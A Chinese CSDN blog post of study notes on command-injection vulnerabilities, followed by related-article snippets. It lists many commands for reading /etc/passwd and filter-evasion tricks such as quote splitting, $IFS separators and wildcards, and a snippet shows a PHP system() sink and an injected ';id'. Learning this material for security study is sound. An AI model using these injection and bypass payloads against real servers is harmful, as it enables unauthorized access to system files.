命令执行学习

最新推荐文章于 2024-09-27 17:41:32 发布
最新推荐文章于 2024-09-27 17:41:32 发布
阅读量112 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63017297/article/details/139659864
版权

命令执行漏洞也是一种注入,属于高位漏洞之一,也属于代码执行的范畴

命令执行漏洞原理

在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

实例

linux:

cat /etc/passwd
tac /etc/passwd
head /etc/passwd
tail /etc/passwd
less /etc/passwd
more /etc/passwd
grep '' /etc/passwd     grep . /etc/passwd 
awk {print} /etc/passwd 
sed '' /etc/passwd
nl /etc/passwd
sort /etc/passwd
diff /etc/passwd /etc/hostname
base64 /etc/passwd
xxd /etc/passwd
od -a /etc/passwd
cp /etc/passwd /dev/stdout

如果上列关键词都被过滤可尝试分隔符

c''a\t /etc/passwd

 重定向符

c''a\t</etc/passwd

 内部字段分隔符

cat${IFS} /etc/passwd

cat$IFS$9 /etc/passwd

如果对文件名进行过滤的话可以使用通配符

cat /etc/passw*

x3c
关注
DVWA——命令执行漏洞学习
Lemon's blog
08-12 4038
前言:命令执行和代码执行也是web安全中常见的一种漏洞,这次就来学习一下。
Redis学习教程之命令执行过程详解
09-09
Redis 是一个高性能的键值数据库,其命令执行过程是 Redis 运行机制的关键部分。本文将深入探讨 Redis 如何接收并执行来自客户端的命令,以及其中涉及的数据结构和原理。 首先,Redis 采用单线程模型,但它通过 I/O...
CTF命令执行学习笔记
qq_42911487的博客
10-31 3080
CTF命令执行学习笔记 php常见的命令执行函数(这里只谈命令执行不涉及代码执行) system、popen、shell_exec、exec、passthru、反引号(比如echo ls;反引号实际是shell_exec的另一种形式) //通常以以下形式出现,题外话eval中可以直接闭合php标签另起一个php... <?php $a=$_GET[1]; //一些过滤 system($a); ?> 命令执行绕过空格 1.$IFS、$IFS$9、$IFS$@、$IFS$*等 在linux中IFS
深度学习常用命令
qq_29960631的博客
11-26 1814
主要对深度学习常用到的一些命令进行汇总,同时也为了方便自己查阅 文章目录前言一、【CMD命令】1、查看当前显卡驱动版本以及可适用的最高cuda版本:2、查看anaconda版本二、【Anaconda命令】1、查看源2.更换国内源:三、【标签工具】 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、【CMD命令】 1、查看当前显卡驱动
Linux学习命令之source
wlzx059的博客
11-18 1918
这将执行指定路径的脚本文件,其中可以包含变量、函数和其他可执行的Shell命令执行完后,其中定义的环境变量、函数等将在当前shell会话中生效。这将执行指定路径的脚本文件,其中可以包含变量、函数和其他可执行的Shell命令执行完后,其中定义的环境变量、函数等将在当前shell会话中生效。命令用于在当前shell环境中执行指定脚本文件中的命令命令用于在当前shell环境中执行指定脚本文件中的命令。脚本文件中的命令,以确保其中所做的更改立即生效。脚本文件中的命令,以确保其中所做的更改立即生效。
Kali基本命令学习
2301_76310805的博客
03-11 3838
kali的基本介绍和简单命令
linux常用命令学习总结(超详细)
热门推荐
wanghuiwei888的博客
05-26 3万+
作为一个程序员,我们在进行项目部署和运维时,经常会用到一些linux命令,可是这些命令老是忘记,每次用到的时候都要去谷歌百度,很是麻烦!这不,为了自己使用方便,对常见的linux命令进行了系统的总结,以便在用到时能够快速地找到相关命令,同时有需要的朋友也可以参考搜藏该篇文章!文章对讲到的每个命令都有详细的参数解释,并且给出一些常用例子,因此也非常适合用来学习! 全文命令分为以下6个模块: 1、...
stata机器学习命令
cimeth的博客
01-16 1266
stata机器学习分类命令:c_ml_stata stata机器学习回归命令:r_ml_stata stata回归树命令:srtree 该命令通过最优修剪、套袋、随机森林和增强方法实现回归树。输出结为R文件,需要使用R语言打开,运行。 ...
Shell学习--echo命令
From now on...的Blogs
08-08 2903
shell学习
oracle学习48-oracle命令窗口执行sql语句
qq_41632427的博客
08-09 1148
oracle
命令执行漏洞详解
weixin_42566218的博客
03-08 1万+
一、命令执行漏洞原理 在编写程序的时候,当碰到要执行系统命令来获取一些信息时,就要调用外部命令的函数,比如php中的exec()、system()等,如果这些函数的参数是由用户所提供的,那么恶意用户就可能通过构造命令拼接来执行额外系统命令,比如这样的代码 <?php system("ping -c 1 ".$_GET['ip']); ?> 程序的本意是让用户传入一个ip地址去测试网络连通性,但是由于参数不可控,当我们传入的ip参数为"127.0.0.1;id“时,执行命令就便成了
Linux学习 - 命令运行监测和软件安装
06-20
Linux学习 - 命令运行监测和软件安装 在 Linux 中,命令运行监测和软件安装是两个非常重要的概念。命令运行监测是指监测当前命令的运行时间和资源使用情况,而软件安装则是指在 Linux 系统中安装新的软件包。 命令...
Linux基础命令学习——文本文件编辑命令(三)
01-09
一名菜鸟学习编程技术,记录所学...Ctrl + C:强制中断命令执行 Ctrl + D:退出交互模式 cat >test.txt:把内容写入到test.txt文件中,Ctrl + D保存退出 more命令 用于查看纯文本文件(内容较多的);格式:more
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 606
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1327
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
个人计算机与网络的安全
nn_84的博客
09-24 260
关于 wifi 大家都知道 wifi 已经使用了 wpa3 非常安全 但很多人不知道 pin 和 wps 这两项有漏洞。种漏洞来控制用户电脑 老实说吧 默认用户仍然是管理员 像windows 是很容易得到最高权限的。关于 病毒 大家都知道中国 美国 俄罗斯 的黑客不断的在对抗 所以这病毒花样百出 所以系统用户。关于 国产的 linux 老实说全是漏洞 默认开启 很多服务 但初始化的设置都有漏洞。我发现很多用户都简单设置了这两项 他们的设置 使他们的网络出现了漏洞。
Splashtop 加入 Microsoft 智能安全协会
最新发布
SplashtopLoki的博客
09-27 435
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 593
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Java学习:操作系统接口与命令执行
"Java学习文档,讲解如何执行命令,涵盖了操作系统接口、命令接口、Shell命令、系统调用等概念,适合Java初学者" 在Java学习过程中,了解操作系统接口是非常重要的,因为这涉及到如何与系统进行交互,执行各种操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值